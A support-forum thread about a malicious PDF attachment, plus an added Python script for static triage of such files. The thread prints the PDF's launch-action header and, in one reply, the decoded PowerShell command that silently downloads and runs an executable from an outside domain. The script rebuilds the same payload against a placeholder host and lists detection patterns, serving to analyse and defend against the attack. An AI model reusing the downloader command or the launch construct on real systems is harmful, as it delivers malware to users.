Hazardous pdf file?
I have heard of the potential for pdf attachments to be hazardous but had not seen a suspicious one until this morning. Here are the first several lines of the file as seen in the preview pane of my email client:
%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand
Would someone please provide a brief explanation of what this is, because it appears that an execution of PowerShell will occur when the PDF is opened. If so, what settings do I need to look at in Editor and Viewer to ensure such action is prevented?
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
Re: Hazardous pdf file?
Hi Brian,
Thanks for the post - without the file, we can only tell as much as you can. It looks like the PDF is set to run a powershell command, but that's all we can see. Please send the file and I'll see if the Dev. Team can take a quick look.
Cheers,
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Re: Hazardous pdf file?
File is attached as powershell_exe.7z.
- Attachments
-
- powershell_exe.7z
- This compressed pdf file contains what appears to be a powershell executable command.
- (927 Bytes) Downloaded 90 times
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
Re: Hazardous pdf file?
Hi Brian,
Thanks for that - devs. have taken a look and can't see what it's doing, because the command is encoded, but it's almost certainly malicious and we block this action by default, so you should be safe if you opened it, so long as you did not allow it to run.
Cheers,
Re: Hazardous pdf file?
Could you explain what behavior I would expect to see if it tried to run? I am very concerned about this because I normally open PDF attachments. It was just a fluke that I had attachment preview enabled in my email client, so I noticed the PowerShell-related content before I opened the file.
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
Re: Hazardous pdf file?
Hi Brian,
I'm afraid that we cannot tell what it would do, because the command that it was set to run was encrypted. However, opening the PDF would display this message:
The command will not execute unless you explicitly hit yes, on this message. You should be safe with most malicious files, with our software.
Thanks,
Re: Hazardous pdf file?
That popup warning is exactly what I was wondering about. Very nice!
Thanks Will.
--
Brian
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
Re: Hazardous pdf file?
No worries Brian
Re: Hazardous pdf file?
The decoded command is:
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)
It silently downloads a file "mike.exe" from ncduganda.org and executes it.
Cheers
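The two things this thread turns on, a /OpenAction that fires a /Launch of powershell.exe and a -EncodedCommand that hides what is run, can both be checked statically without opening the file. The script below is an added example for triaging such attachments; it is not code from the thread or from Tracker Software. It builds its own constructed sample PDF with the same object layout as the one Brian posted (the command points at the reserved host example.invalid and the file name x.exe, both placeholders), decodes the -EncodedCommand argument (PowerShell expects base64 of the UTF-16LE command text, which is why the decode step is needed), and flags the download-then-run chain that ChrisZ16 found. The indicator list and the verdict thresholds are the author's own choices, not anything the thread specifies.

```python
import base64
import re

# Constructed sample input (not the file from the thread): the same
# /OpenAction -> /Launch -> powershell.exe -EncodedCommand layout, with the
# command built here from a placeholder that points at the reserved host
# example.invalid, which never resolves.
SAMPLE_COMMAND = (
    "PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "
    "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/x.exe', "
    "$env:APPDATA\\x.exe);Start-Process ($env:APPDATA\\x.exe)"
)


def encode_powershell(command: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE bytes of the command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


SAMPLE_PDF = (
    "%PDF-1.1\n1 0 obj\n<<\n/OpenAction <<\n/S /Launch\n/Win\n<<\n"
    "/F (C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)\n"
    "/P (powershell.exe -EncodedCommand " + encode_powershell(SAMPLE_COMMAND) + ")\n"
    ">>\n>>\n>>\nendobj\n"
).encode("latin-1")

OPENACTION_RE = re.compile(rb"/OpenAction")
LAUNCH_RE = re.compile(rb"/S\s*/Launch")
TARGET_RE = re.compile(rb"/F\s*\(([^)]*)\)")   # /Launch file target
PARAMS_RE = re.compile(rb"/P\s*\(([^)]*)\)")   # /Launch parameters
# PowerShell accepts -EncodedCommand and its unambiguous prefixes (-enc, -ec, -e).
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicator patterns chosen for this example; extend to taste.
INDICATORS = {
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|BitsTransfer", re.I),
    "execute": re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
}


def decode_encoded_command(b64: str):
    """Reverse -EncodedCommand; returns None when the text is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_pdf(data: bytes) -> dict:
    """Static triage: flag an auto-firing /Launch action and inspect its command line."""
    report = {
        "open_action": bool(OPENACTION_RE.search(data)),
        "launch_action": bool(LAUNCH_RE.search(data)),
        "launch_target": None,
        "decoded_command": None,
        "indicators": [],
        "verdict": "clean",
    }
    if not report["launch_action"]:
        return report
    report["verdict"] = "suspicious"          # a /Launch action alone warrants a look
    target = TARGET_RE.search(data)
    params = PARAMS_RE.search(data)
    report["launch_target"] = target.group(1).decode("latin-1") if target else None
    command_line = params.group(1).decode("latin-1") if params else ""
    enc = ENCODED_RE.search(command_line)
    if enc:
        report["decoded_command"] = decode_encoded_command(enc.group(1))
    # Scan both the visible launch parameters and the decoded payload.
    text = command_line + "\n" + (report["decoded_command"] or "")
    report["indicators"] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if "download" in report["indicators"] and "execute" in report["indicators"]:
        report["verdict"] = "malicious"       # download-then-run chain, as in the thread
    return report


if __name__ == "__main__":
    for key, value in triage_pdf(SAMPLE_PDF).items():
        print(f"{key}: {value}")
```

Run it on a real attachment with `triage_pdf(open(path, "rb").read())` from a machine where the file will not be opened by a viewer; a "suspicious" verdict with a /Launch target of powershell.exe or cmd.exe is reason enough to stop, whatever the decoded command says, and a viewer that prompts before running a /Launch action, as described above, is the last line rather than the first.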
- Patrick-Tracker Supp
- Site Admin
- Posts: 1645
- Joined: Thu Mar 27, 2014 6:14 pm
- Location: Vancouver Island
Re: Hazardous pdf file?
Hello ChrisZ16
Thank you very much for the translation! That makes it abundantly clear that this file does indeed contain malicious content.
Cheers!
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Cheers,
Patrick Charest
Tracker Support North America